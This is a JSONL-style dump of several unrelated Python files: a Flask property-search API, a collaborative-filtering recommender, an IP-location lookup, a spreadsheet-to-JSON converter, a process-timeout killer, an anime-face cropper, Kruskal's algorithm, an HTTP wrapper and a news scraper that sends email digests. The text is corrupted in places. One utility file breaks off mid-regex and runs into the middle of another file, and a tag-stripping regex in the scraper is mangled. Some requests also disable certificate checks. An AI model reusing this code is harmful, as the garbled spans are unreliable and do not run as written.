'qualifier':\n if 'scope' in info and not 'Q' in info['scope']:\n if 'scope_man' in info:\n continue\n r[4].append(pnode)\n continue\n else:\n if 'scope' in info and not 'V' in info['scope']:\n if 'scope_man' in info:\n continue\n r[4].append(pnode)\n continue\n r[k].append(pnode)\n\n return r\n\n def filter_by_allowed_qualifiers(self, ranked, constraint):\n\n if constraint is None:\n return ranked\n\n if not constraint in self.constraints:\n return ranked\n\n constr_dic = self.constraints[constraint]\n\n if not 'allowed_qualifiers' in constr_dic:\n return ranked\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if not pnode in constr_dic['allowed_qualifiers']:\n continue\n r[k].append(pnode)\n\n return r\n\n def filter_by_required_qualifiers(self, ranked, constraint):\n\n if constraint is None:\n return ranked\n\n if not constraint in self.constraints:\n return ranked\n\n constr_dic = self.constraints[constraint]\n\n if not 'required_qualifiers' in constr_dic:\n return ranked\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if pnode in constr_dic['required_qualifiers']:\n r[0].append(pnode)\n continue\n r[k].append(pnode)\n\n return r\n\n def filter_by_conflicts(self, ranked, otherProperties):\n\n if otherProperties == '':\n return ranked\n\n properties = otherProperties.split(',')\n disallowed = set()\n for pnode in properties:\n if pnode in self.constraints and 'conflicts' in self.constraints[pnode]:\n for p in self.constraints[pnode]['conflicts']:\n disallowed.add(p)\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if pnode in disallowed:\n continue\n r[k].append(pnode)\n\n return r\n\n def find_property(self, label, params):\n\n params['type'] = PropertyFinder.metadata.get_type_alias(params['type'])\n\n candidates = self.get_candidates(label, params['type'])\n\n if params['filter']:\n candidates = self.filter_ranked(candidates, params)\n\n for level in candidates:\n candidates[level] = PropertyFinder.ranker.rank(candidates[level], label, PropertyFinder.metadata,\n scope=params['scope'])\n\n return dict(sorted(candidates.items(), key=lambda x: x[0]))\n\n def generate_top_candidates(self, params, size=10):\n ''' argument params may include the following parameters:\n type\n scope\n filter\n constraint\n otherProperties\n '''\n\n if not 'type' in params:\n params['type'] = None\n if not 'scope' in params:\n params['scope'] = 'both'\n if not 'filter' in params:\n params['filter'] = True\n if not 'constraint' in params:\n params['constraint'] = None\n if not 'otherProperties' in params:\n params['otherProperties'] = ''\n\n label = params.pop('label')\n\n candidates = self.find_property(label, params)\n\n results = []\n for level in candidates:\n for pnode, score in candidates[level].items():\n\n results.append(PropertyFinder.metadata.get_info(pnode, score, params['extra_info']))\n if len(results) >= size:\n break\n\n if len(results) >= size:\n break\n\n return results\n\n def _build_params(self, label, type_, scope='both', filter='true', constraint=None,\n otherProperties='', extra_info=False):\n ''' Build the dictionary of parameters\n '''\n return {'label': label,\n 'type': type_,\n 'scope': scope,\n 'filter': filter.lower() == 'true',\n 'constraint': constraint,\n 'otherProperties': otherProperties,\n 'extra_info': extra_info.lower() == 'true'}\n\n def search(self):\n ''' Flask API interface\n '''\n label = request.args.get('label', '')\n if label == '':\n return {'Error': 'label (query string) needed. Please enter the following parameter ?label=xxx'}, 400\n\n type_ = request.args.get('data_type', None)\n if type_ is None:\n type_ = request.args.get('type', None)\n\n if not type_ is None and not PropertyFinder.metadata.check_type_allowed(type_):\n return {'Error': 'Input data_type is not supported'}, 400\n\n # Check remote is running\n response = get(f'{self.host}/time?extra_info=true&language=en&item=property&type=ngram&size=1&instance_of=',\n verify=False)\n if response.status_code >= 500:\n return {'Error': 'Remote service for querying properties is down.'}, 500\n\n scope = request.args.get('scope', 'both')\n filter = request.args.get('filter', 'true')\n constraint = request.args.get('constraint', None)\n otherProperties = request.args.get('otherProperties', '')\n size = request.args.get('size', 10)\n extra_info = request.args.get('extra_info', 'false')\n\n try:\n size = int(size)\n except:\n return {'Error': 'size parameter must be an integer'}, 400\n\n params = self._build_params(label, type_, scope, filter, constraint,\n otherProperties, extra_info)\n\n return self.generate_top_candidates(params, size)\n","sub_path":"api/PropertyFinder2.py","file_name":"PropertyFinder2.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"641670847","text":"import importlib.util as im_util\nimport re\nimport os\nimport torch\nimport numpy as np\nimport random\n\ndef import_file(file_name):\n spec = im_util.spec_from_file_location(\".\", f\"{file_name}.py\")\n file = im_util.module_from_spec(spec)\n spec.loader.exec_module(file)\n return file\n\n\ndef convert_str_from_camel_to_underscore(input):\n return re.sub(r'(? 0)\r\n #ind[item-1] = False\r\n normal_cosine = np.sum(np.absolute(sim_cosine[ind]))\r\n normal_jaccard = np.sum(np.absolute(sim_jaccard[ind]))\r\n normal_pearson = np.sum(np.absolute(sim_pearson[ind]))\r\n if normal_cosine > 0:\r\n item_pred_cosine = np.dot(sim_cosine,M[user-1])/normal_cosine\r\n\r\n if normal_jaccard > 0:\r\n item_pred_jaccard = np.dot(sim_jaccard,M[user-1])/normal_jaccard\r\n\r\n if normal_pearson > 0:\r\n item_pred_pearson = np.dot(sim_pearson,M[user-1])/normal_pearson\r\n\r\n if item_pred_cosine < 0:\r\n item_pred_cosine = 0\r\n\r\n if item_pred_cosine > 5:\r\n item_pred_cosine = 5\r\n\r\n if item_pred_jaccard < 0:\r\n item_pred_jaccard = 0\r\n\r\n if item_pred_jaccard > 5:\r\n item_pred_jaccard = 5\r\n\r\n if item_pred_pearson < 0:\r\n item_pred_pearson = 0\r\n\r\n if item_pred_pearson > 5:\r\n item_pred_pearson = 5\r\n\r\n #user-based\r\n if np.count_nonzero(M[user-1]):\r\n sim_cosine = sim_user_cosine[user-1]\r\n sim_jaccard = sim_user_jaccard[user-1]\r\n sim_pearson = sim_user_pearson[user-1]\r\n ind = (M[:,item-1] > 0)\r\n #ind[user-1] = False\r\n normal_cosine = np.sum(np.absolute(sim_cosine[ind]))\r\n normal_jaccard = np.sum(np.absolute(sim_jaccard[ind]))\r\n normal_pearson = np.sum(np.absolute(sim_pearson[ind]))\r\n if normal_cosine > 0:\r\n user_pred_cosine = np.dot(sim_cosine,M[:,item-1])/normal_cosine\r\n\r\n if normal_jaccard > 0:\r\n user_pred_jaccard = np.dot(sim_jaccard,M[:,item-1])/normal_jaccard\r\n\r\n if normal_pearson > 0:\r\n user_pred_pearson = np.dot(sim_pearson,M[:,item-1])/normal_pearson\r\n\r\n if user_pred_cosine < 0:\r\n user_pred_cosine = 0\r\n\r\n if user_pred_cosine > 5:\r\n user_pred_cosine = 5\r\n\r\n if user_pred_jaccard < 0:\r\n user_pred_jaccard = 0\r\n\r\n if user_pred_jaccard > 5:\r\n user_pred_jaccard = 5\r\n\r\n if user_pred_pearson < 0:\r\n user_pred_pearson = 0\r\n\r\n if user_pred_pearson > 5:\r\n user_pred_pearson = 5\r\n\r\n if (user_pred_cosine != 0 and user_pred_cosine != 5) and (item_pred_cosine != 0 and item_pred_cosine != 5):\r\n pred_cosine = (user_pred_cosine + item_pred_cosine)/2\r\n else:\r\n if (user_pred_cosine == 0 or user_pred_cosine == 5):\r\n if (item_pred_cosine != 0 and item_pred_cosine != 5):\r\n pred_cosine = item_pred_cosine\r\n else:\r\n pred_cosine = 3.0\r\n else:\r\n if (user_pred_cosine != 0 and user_pred_cosine != 5):\r\n pred_cosine = user_pred_cosine\r\n else:\r\n pred_cosine = 3.0\r\n\r\n if (user_pred_jaccard != 0 and user_pred_jaccard != 5) and (item_pred_jaccard != 0 and item_pred_jaccard != 5):\r\n pred_jaccard = (user_pred_jaccard + item_pred_jaccard)/2\r\n else:\r\n if (user_pred_jaccard == 0 or user_pred_jaccard == 5):\r\n if (item_pred_jaccard != 0 and item_pred_jaccard != 5):\r\n pred_jaccard = item_pred_jaccard\r\n else:\r\n pred_jaccard = 3.0\r\n else:\r\n if (user_pred_jaccard != 0 and user_pred_jaccard != 5):\r\n pred_jaccard = user_pred_jaccard\r\n else:\r\n pred_jaccard = 3.0\r\n\r\n if (user_pred_pearson != 0 and user_pred_pearson != 5) and (item_pred_pearson != 0 and item_pred_pearson != 5):\r\n pred_pearson = (user_pred_pearson + item_pred_pearson)/2\r\n else:\r\n if (user_pred_pearson == 0 or user_pred_pearson == 5):\r\n if (item_pred_pearson != 0 and item_pred_pearson != 5):\r\n pred_pearson = item_pred_pearson\r\n else:\r\n pred_pearson = 3.0\r\n else:\r\n if (user_pred_pearson != 0 and user_pred_pearson != 5):\r\n pred_pearson = user_pred_pearson\r\n else:\r\n pred_pearson = 3.0\r\n\r\n #print (\"pedcosine\" + \"\\n\" + str(user) + \"\\t\" + str(item) + \"\\t\" + str(e[2]) + \"\\t\" + str(pred_cosine) + \"\\t\" + str(pred_jaccard) + \"\\t\" + str(pred_pearson))\r\n pred_rate_cosine.append(pred_cosine)\r\n pred_rate_jaccard.append(pred_jaccard)\r\n pred_rate_pearson.append(pred_pearson)\r\n\r\n rmse_cosine.append(sqrt(mean_squared_error(true_rate, pred_rate_cosine)))\r\n rmse_jaccard.append(sqrt(mean_squared_error(true_rate, pred_rate_jaccard)))\r\n rmse_pearson.append(sqrt(mean_squared_error(true_rate, pred_rate_pearson)))\r\n\r\n rmse_cosine = sum(rmse_cosine) / float(len(rmse_cosine))\r\n rmse_pearson = sum(rmse_pearson) / float(len(rmse_pearson))\r\n rmse_jaccard = sum(rmse_jaccard) / float(len(rmse_jaccard))\r\n\r\n\r\n f_rmse = open(file4,\"w\")\r\n f_rmse.write(str(rmse_cosine) + \"\\t\" + str(rmse_jaccard) + \"\\t\" + str(rmse_pearson) + \"\\n\")\r\n\r\n rmse = [rmse_cosine, rmse_jaccard, rmse_pearson]\r\n req_sim = rmse.index(min(rmse))\r\n\r\n f_rmse.write(str(req_sim))\r\n f_rmse.close()\r\n\r\n if req_sim == 0:\r\n sim_mat_user = sim_user_cosine\r\n sim_mat_item = sim_item_cosine\r\n\r\n if req_sim == 1:\r\n sim_mat_user = sim_user_jaccard\r\n sim_mat_item = sim_item_jaccard\r\n\r\n if req_sim == 2:\r\n sim_mat_user = sim_user_pearson\r\n sim_mat_item = sim_item_pearson\r\n\r\n return sim_mat_user, sim_mat_item\r\n\r\ndef predictRating1(data, user_data, item_data):\r\n sim_user, sim_item = crossValidation(data, user_data, item_data)\r\n\r\n M = np.zeros((int(users),int(items)))\r\n for e in data:\r\n M[e[0]-1][e[1]-1] = e[2]\r\n\r\n print(M)\r\n\r\ndef predictRating(data, user_data, item_data):\r\n sim_user, sim_item = crossValidation(data, user_data, item_data)\r\n\r\n M = np.zeros((int(users),int(items)))\r\n for e in data:\r\n M[e[0]-1][e[1]-1] = e[2]\r\n\r\n f = open(file5,\"r\")\r\n toBeRated = {\"user\":[], \"item\":[]}\r\n for row in f:\r\n r = row.split(',')\r\n toBeRated[\"item\"].append(int(r[1]))\r\n toBeRated[\"user\"].append(int(r[0]))\r\n\r\n f.close()\r\n\r\n pred_rate = []\r\n\r\n #fw = open('result3.csv','w')\r\n fw_w = open(file6,'w') #poonam changed file path\r\n\r\n l = len(toBeRated[\"user\"])\r\n for e in range(l):\r\n user = toBeRated[\"user\"][e]\r\n item = toBeRated[\"item\"][e]\r\n\r\n user_pred = 3.0\r\n item_pred = 3.0\r\n\r\n #item-based\r\n if np.count_nonzero(M[:,item-1]):\r\n sim = sim_item[item-1]\r\n ind = (M[user-1] > 0)\r\n #ind[item-1] = False\r\n normal = np.sum(np.absolute(sim[ind]))\r\n if normal > 0:\r\n item_pred = np.dot(sim,M[user-1])/normal\r\n\r\n if item_pred < 0:\r\n item_pred = 0\r\n\r\n if item_pred > 5:\r\n item_pred = 5\r\n\r\n #user-based\r\n if np.count_nonzero(M[user-1]):\r\n sim = sim_user[user-1]\r\n ind = (M[:,item-1] > 0)\r\n #ind[user-1] = False\r\n normal = np.sum(np.absolute(sim[ind]))\r\n if normal > 0:\r\n user_pred = np.dot(sim,M[:,item-1])/normal\r\n\r\n if user_pred < 0:\r\n user_pred = 0\r\n\r\n if user_pred > 5:\r\n user_pred = 5\r\n\r\n if (user_pred != 0 and user_pred != 5) and (item_pred != 0 and item_pred != 5):\r\n pred = (user_pred + item_pred)/2\r\n else:\r\n if (user_pred == 0 or user_pred == 5):\r\n if (item_pred != 0 and item_pred != 5):\r\n pred = item_pred\r\n else:\r\n pred = 3.0\r\n else:\r\n if (user_pred != 0 and user_pred != 5):\r\n pred = user_pred\r\n else:\r\n pred = 3.0\r\n\r\n #pred = (user_pred + item_pred)/2\r\n pred_rate.append(pred)\r\n #print(\"Main OUTPUT\")\r\n #print (str(user) + \",\" + str(item) + \",\" + str(pred))\r\n print (str(item))\r\n fw_w.write(str(pred) + \"\\n\")\r\n\r\n\r\n #fw.close()\r\n fw_w.close()\r\n\r\n\r\nratings_csv_data = readingFile(file1)\r\n#print(\"ratings_csv_data\")\r\n#print(ratings_csv_data)\r\n\r\nuser_data = userData(file2)\r\n#print(\"user_data\")\r\n#print(user_data)\r\n\r\nitem_data = itemData(file3)\r\n#print(\"item_data\")\r\n#print(item_data)\r\n\r\n#sim_item_cosine, sim_item_jaccard, sim_item_pearson = similarity_item(item_data)\r\n#print(sim_item_cosine, sim_item_jaccard, sim_item_pearson)\r\n\r\n#sim_user_cosine, sim_user_jaccard, sim_user_pearson = similarity_user(user_data)\r\n#print(sim_user_cosine, sim_user_jaccard, sim_user_pearson)\r\n\r\n#crossValidation(ratings_csv_data, user_data, item_data)\r\n\r\n#sim_user, sim_item = crossValidation(ratings_csv_data, user_data, item_data)\r\n#print(sim_user, sim_item)\r\n\r\npredictRating(ratings_csv_data, user_data, item_data)\r\n\r\nsys.stdout.flush()\r\n","sub_path":"python/hybrid.py","file_name":"hybrid.py","file_ext":"py","file_size_in_byte":18632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"20773978","text":"import socket\nfrom .ip_func import format_ip, in_line, is_ip\nimport time\nfrom ..config import setting\n\n\ndef get_ip_address(host_or_ip):\n '''\n 使用2分查找法寻找ip的具体地址\n :param host_or_ip: 域名或者是ip字符串\n :return: 返回ip的具体地址\n '''\n if not is_ip(host_or_ip):\n raise TypeError\n ret = socket.getaddrinfo(host_or_ip, 'http')\n rel_ip = ret[0][4][0]\n with open(setting.data_dir, mode='r', encoding='gbk') as f:\n ip_data = f.readlines()\n lines_num = len(ip_data)\n start_line = 0\n end_line = lines_num - 1\n for i in range(lines_num):\n middle = int((start_line + end_line) / 2)\n if in_line(ip_data[middle], rel_ip) == 0:\n return format_ip(ip_data[middle])[2]\n break\n elif in_line(ip_data[middle], rel_ip) == -1:\n end_line = middle - 1\n else:\n start_line = middle + 1\n\n\ndef main():\n '''\n 测试使用的main函数\n :return: 无返回值\n '''\n start_time = time.time()\n print(get_ip_address('www.baidu.com'))\n print(time.time() - start_time)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"build/lib/ip_address/ip_pack/ip_addr.py","file_name":"ip_addr.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109908569","text":"import xlrd\nimport json\n\nclass Converter:\n def __init__(self, xls_file=\"sample.xls\"):\n self.xls_file = xlrd.open_workbook(xls_file)\n self.labels = []\n self.traductor = {}\n self.elected = []\n\n def sheets(self):\n return self.xls_file.sheet_names()\n\n def get_labels(self):\n for cell in self.xls_file.sheets()[0].row(0):\n self.labels.append(cell.value)\n self.traductor = dict(zip(self.labels, list(range(len(self.labels)))))\n # self.traductor\n # Keys should be: 'CIVILITE': 0, 'PRENOM': 1, 'NOM': 2, 'FONCTION': 3,\n # 'TITRE': 4, 'PROTOCOLE ROLE': 5, 'PROTOCOLE PERSONNE': 6,\n # 'DEPARTEMENT ELECTION': 7, 'REGION ELECTION': 8, 'TEL DIRECT': 9,\n # 'TEL ORGANISME': 10, 'EMAIL DIRECT': 11, 'EMAIL ORGANISME': 12,\n # 'ORGANISME': 13, 'ADRESSE 1': 14, 'ADRESSE 2': 15, 'CP': 16,\n # 'VILLE': 17, 'PAYS': 18, 'WEB': 19, 'TYPE': 20, 'SOUS TYPE': 21\n return self.labels\n\n def build_json(self, limit=0):\n list_of_row = []\n for i in range(1, self.xls_file.sheets()[0].nrows):\n d = dict((str(title), str(cell.value))\n for (title, cell) in zip(\n self.labels,\n self.xls_file.sheets()[0].row(i)\n ))\n list_of_row.append(d)\n print(i, d)\n if i == limit:\n break\n data = {}\n data[\"headers\"] = self.labels\n data[\"elected\"] = list_of_row\n with open('elected.json', 'w') as outfile:\n json.dump(data, outfile)\n\ndef main():\n converter = Converter(\"database_clean2.xls\")\n converter.get_labels()\n converter.build_json()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"_import/xls_to_json.py","file_name":"xls_to_json.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"208234963","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n# Created by on 15:15 2017/9/21\r\n# data structure\r\n# if timeout is set,\r\n# self.pid_dict | key: pid | value: [elapsed_time, last_time_stamp]\r\n#\r\n# if timeout is None,\r\n# self.pid_dict | key: pid | value: loop_times\r\n\r\nimport time\r\nimport psutil\r\nimport traceback\r\n\r\n__author__ = 'Shawn Yan'\r\n\r\n\r\ndef say_it(msg, debug=1):\r\n if debug:\r\n print(msg)\r\n\r\ndef _kill_process(pid, debug):\r\n say_it(\"Kill process: %s <%s>\" % (pid, time.ctime()), 1)\r\n try:\r\n p = psutil.Process(pid)\r\n for foo in p.children(recursive=True):\r\n say_it(\"kill children process of %s\" % p, debug)\r\n foo.terminate()\r\n else:\r\n p.terminate()\r\n except:\r\n say_it(\"Warning. Cannot kill pid: %s\" % pid)\r\n say_it(traceback.format_exc(), debug)\r\n\r\n\r\nclass Timeout(object):\r\n def __init__(self, monitors, sleep_time, sleep_steps, timeout, debug):\r\n self.monitors = monitors\r\n self.sleep_time = sleep_time\r\n self.sleep_steps = sleep_steps\r\n self.timeout = timeout\r\n self.debug = debug\r\n\r\n def process(self):\r\n self.pid_dict = dict()\r\n while True:\r\n new_keys = self.get_new_keys()\r\n if self.timeout:\r\n _pid_dict = dict()\r\n for key in new_keys:\r\n cur_time = time.time()\r\n if key in list(self.pid_dict.keys()):\r\n old_elapsed, old_time = self.pid_dict.get(key)\r\n new_elapsed = cur_time - old_time + old_elapsed\r\n _pid_dict[key] = [new_elapsed, cur_time]\r\n else:\r\n _pid_dict[key] = [0, cur_time]\r\n self.pid_dict = _pid_dict # update it!\r\n else:\r\n self.pid_dict = dict(list(zip(new_keys, [self.pid_dict.get(item, 0)+1 for item in new_keys])))\r\n say_it(self.pid_dict, self.debug)\r\n self.kill_timeout()\r\n # go to sleep\r\n say_it(\"Sleeping ...\", self.debug)\r\n time.sleep(self.sleep_time)\r\n\r\n def get_new_keys(self):\r\n \"\"\"\r\n Get current pid list which name is in the monitor list\r\n :return:\r\n \"\"\"\r\n _new_keys = list()\r\n pid_list = psutil.get_pid_list()\r\n for pid in pid_list:\r\n try:\r\n p = psutil.Process(pid)\r\n _name = p.name()\r\n if _name in self.monitors:\r\n _new_keys.append(pid)\r\n except:\r\n pass\r\n # skip the error\r\n # say_it(traceback.format_exc(), self.debug)\r\n return _new_keys\r\n\r\n def kill_timeout(self):\r\n \"\"\"\r\n kill timeout process's children process one by one\r\n :return:\r\n \"\"\"\r\n _pid_keys = list(self.pid_dict.keys())\r\n for _pid in _pid_keys:\r\n _value = self.pid_dict.get(_pid)\r\n will_kill = (_value[0] > self.timeout) if self.timeout else (_value > self.sleep_steps)\r\n if will_kill:\r\n _kill_process(_pid, self.debug)\r\n\r\nif __name__ == \"__main__\":\r\n my_tst = Timeout([\"pnmainc.exe\"], 3, 10, 10, 0)\r\n my_tst.process()\r\n","sub_path":"tmp_client/tools/corescripts3/DEV/bin/xlib/xTimeout.py","file_name":"xTimeout.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527799845","text":"n = int(input())\n\ndata = list(map(int, input().split()))\n\nd = [0] * n\nd[0] = data[0]\n\nfor i in range(1, n):\n d[i] = max(d[i - 1] + data[i], data[i])\n\nprint(max(d))","sub_path":"1912.py","file_name":"1912.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"336905812","text":"import cv2\nimport os\nimport sys\nfrom glob import glob\nfrom tqdm import tqdm\n\n\ndef bulk_convert(src, dst, cascade_file = \"lbpcascade_animeface.xml\"):\n if not os.path.isfile(cascade_file):\n raise RuntimeError(\"%s: not found\" % cascade_file)\n\n # Create classifier\n cascade = cv2.CascadeClassifier(cascade_file)\n for character_folder in [x.path for x in os.scandir(src) if x.is_dir()]:\n print(character_folder)\n files = [y for x in os.walk(character_folder) for y in glob(os.path.join(x[0], '*.*'))]\n for image_file in tqdm(files):\n try:\n target_path = \"/\".join(image_file.strip(\"/\").split('/')[1:-1])\n target_path = os.path.join(dst, target_path)\n # target_path = os.path.join(target_path, character_folder.split(\"\\\\\")[-1]) + \"\\/\"\n if not os.path.exists(target_path):\n os.makedirs(target_path)\n image = cv2.imread(image_file)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.equalizeHist(gray)\n faces = cascade.detectMultiScale(gray,\n # detector options\n scaleFactor = 1.1,\n minNeighbors = 2,\n minSize = (30, 30))\n f = 0\n for (x, y, w, h) in faces:\n \n \n crop_img = image[y:y+h, x:x+w]\n filename = os.path.basename(image_file).split('.')[0]\n #print(f,filename)\n f+=1\n cv2.imwrite(\n os.path.join(target_path, filename +'_' + str(f) + \".jpg\"),\n crop_img\n )\n except:\n print(image_file)\n \n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write(\"usage: bulk_convert.py \\n\")\n sys.exit(-1)\n\n bulk_convert(sys.argv[1], sys.argv[2])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"anime face croppping/bulk_convert.py","file_name":"bulk_convert.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"651338579","text":"import time\nparent=[-1]*30\ndef graph_input():\n\tgraph=[]\n\tedge=int(input(\"Enter no. of edges :\"))\n\tprint(\"Enter edges with weights:\")\n\tfor i in range(edge):\n\t\tedges=input(\"Enter edge %d : \"%(i+1))\n\t\tx,y,z=[int(a) for a in edges.split()]\n\t\tgraph.append([x,y,z])\n\tgraph.sort(key=lambda x:x[2])\n\treturn graph\t\n\t\t\t\n\ndef find(i):\n\tif parent[i]==-1:\n\t\treturn i\n\telse:\n\t\treturn find(parent[i])\n\ndef union(i,j):\n\ti_s=find(i)\n\tj_s=find(j)\n\tparent[i_s]=j_s\n\n\ndef kruskal(graph):\n\tresult=[]\n\tencounter=0\n\tk=0\n\tweight=0\n\twhile encounter<3:\n\t\tu=graph[k][0]\n\t\tv=graph[k][1]\n\t\tu_s=find(u)\n\t\tv_s=find(v)\n\t\tif u_s != v_s:\n\t\t\tresult.append([u,v,graph[k][2]])\n\t\t\tunion(u,v)\n\t\t\tencounter+=1\n\t\t\tweight+=graph[k][2]\n\t\tk+=1\n\treturn result,weight\ngraph=graph_input()\nstart=time.clock()\nresult,w=kruskal(graph)\nend=time.clock()\nprint (result)\nprint(\"Weight of MST:\",w)\nprint(\"The Program ran for: \",end-start,\"seconds\")\n","sub_path":"kruskal_new.py","file_name":"kruskal_new.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"562677626","text":"#!/usr/bin/env python3\n# encoding: utf-8\n'''\n@author: lewyuejian\n@license: (C) Copyright 2017-2019, Personal exclusive right.\n@contact: lewyuejian@163.com\n@software: tool\n@application:\n@file: run_method.py\n@time: 2019/12/20 12:08\n@desc:\n'''\nimport json\nimport requests\nclass RunMethod:\n def post_main(self,url,data,header=None):\n res = None\n if header != None:\n res = requests.post(url=url,data=data,headers=header)\n else:\n res = requests.post(url=url,data=data)\n #print(res.status_code)\n return res.json()\n\n def get_main(self,url,data=None,header=None):\n res=None\n if header != None:\n res = requests.get(url=url, data=data, headers=header,verify=False).json()\n else:\n res = requests.get(url=url, data=data,verify=False).json()\n return res\n\n def run_main(self,method,url,data=None,header=None):\n res = None\n if method == 'post':\n res = self.post_main(url,data,header)\n else:\n res = self.get_main(url,data,header)\n return json.dumps(res,ensure_ascii=False,sort_keys=True,indent=2) # sort_keys排序 indent空格\n","sub_path":"data/run_method.py","file_name":"run_method.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"33336917","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @File : daily_news_spider.py\n# @Contact : youker_shawn@163.com\nimport time\n\nimport requests\nfrom urllib.parse import urlencode\nimport datetime\nimport jinja2\nimport zmail\nimport re\nfrom lxml import etree\nimport pymongo\n\n__author__ = 'youker'\n__date__ = '2018/8/21 0021 14:54'\n\n'''\n今XX条,“西安教育”新闻类爬虫\n'''\n\n\ndef get_data_list(offset):\n \"\"\"\n 获取原始新闻信息列表,json格式\n ajax请求地址 https://www.toutiao.com/search_content/?offset=0&format=json&keyword=%E8%A5%BF%E5%AE%89%E6%95%99%E8%82%B2&autoload=true&count=20&cur_tab=1&from=search_tab\n :return: 提取返回的json格式中的data,便于直接提取,以及判断是否停止请求\n \"\"\"\n params = {\n 'offset': offset, # 经分析,每次ajax请求只变动此处,递增20\n 'format': 'json',\n 'keyword': '西安教育',\n 'autoload': 'true',\n 'count': '20',\n 'cur_tab': '1',\n 'from': 'search_tab',\n }\n url = 'https://www.toutiao.com/search_content/?' + urlencode(params)\n head = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n try:\n response = requests.get(url, headers=head)\n if response.status_code == 200:\n data_dict = response.json() # 分析得知返回json数据,直接调用方法解析为字典对象\n if not data_dict.get('data'): # 超出ajax可获取的更多内容offset之后,就停止\n return None\n return data_dict['data']\n except requests.ConnectionError:\n return None\n\n\ndef parse_data_list(data_list):\n \"\"\"\n 解析json数据,\n 根据发布时间,只对当日的新闻进行提取(第二天早上发送)\n 提取:标题、发布时间、发布方、摘要、源url(需要组装好),保存为字典对象\n :param data_list:新闻json列表,需要进行提取\n :return: 字典对象的list,提供进行下一步跳转\n \"\"\"\n today = str(datetime.datetime.now()).split()[0]\n news_list = []\n for item in data_list:\n # 保证是新闻项,且获取当日新闻,否则跳过\n if item.get('source_url') and item.get('datetime') and item['datetime'].split()[0] == today:\n news = {\n 'title': item['title'],\n 'datetime': item['datetime'],\n 'source': item['source'],\n 'abstract': item['abstract'],\n 'source_url': 'https://www.toutiao.com' + item['source_url'],\n }\n news_list.append(news)\n return news_list\n\n\ndef get_news_detail(news_url):\n \"\"\"\n 请求得到详情页\n :return: 详情页\n \"\"\"\n try:\n head = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n }\n # 未添加该字段,可能被识别为爬虫,导致无法获取HTML\n response = requests.get(news_url, headers=head)\n if response.status_code == 200:\n return response.text\n except requests.ConnectionError:\n return None\n\n\ndef parse_news_detail(detail_html):\n \"\"\"\n 提取藏在JS中的目标新闻的HTML文档(html敏感字符是字符实体形式,需转换)\n :return:经转换并剔除图片标签后得到的纯文本内容\n \"\"\"\n # 根据规律,编写正则表达式\n pattern = re.compile('articleInfo:.*?content: \\'(.*?>)\\',.*?groupId:', re.S)\n result = re.search(pattern, detail_html)\n if result:\n article_js = result.group(1)\n # 转换实体名称为标签,便于剔除img相关标签以及提取内容\n article_js = article_js.replace('<', '<').replace('>', '>')\n article_html = re.sub('
', '', article_js)\n # 使用Xpath解析,提取出文本\n html = etree.HTML(article_html)\n result = html.xpath('//text()') # 文本段落列表\n return '\\n'.join(result)\n else:\n return None\n\n\ndef create_email_htmlcontent(news_list):\n \"\"\"\n 根据新闻列表,迭代每则新闻,生成HTML邮件内容\n :param news_list: 新闻列表\n :return: HTML内容\n \"\"\"\n # 使用jinja2模板渲染\n # 1.配置模板文件搜索路径\n TemplateLoader = jinja2.FileSystemLoader(searchpath='F:/code_lxy/Python3/news_spider/')\n # 2.创建环境变量\n TemplateEnv = jinja2.Environment(loader=TemplateLoader)\n\n # 3.加载模板,渲染数据\n template_name = 'email_content.html'\n template = TemplateEnv.get_template(template_name)\n html = template.render({'news_list': news_list})\n return html\n\n\ndef send_email(news_list):\n \"\"\"\n 发送每日新闻邮件\n 从解析列表页返回的字典列表数据中提取:标题,时间,发布方,新闻详情页链接,写成html发送邮件\n :param news_list: 新闻字典对象的列表\n :return: 发送成功与否\n \"\"\"\n # 使用邮箱作为发送方\n server = zmail.server('发送方的邮箱', '邮箱登录密码')\n\n # SMTP function.\n if server.smtp_able():\n print('SMTP 功能已开启')\n else:\n print('SMTP 未开启')\n return False\n # POP function.\n if server.pop_able():\n print('POP 功能已开启')\n else:\n print('POP 功能未开启')\n return False\n\n html_content = create_email_htmlcontent(news_list)\n mail = {\n 'subject': '***youker每日新闻推送服务***',\n 'content-html': html_content,\n }\n # 对目标邮箱进行发送,返回发送结果,文件较大可能会进入垃圾邮件\n return server.send_mail('接收方的邮箱', mail)\n\n\ndef save_to_mongodb(news):\n \"\"\"\n 将包含详情内容的字典对象,处理后,存入Mongodb数据库\n 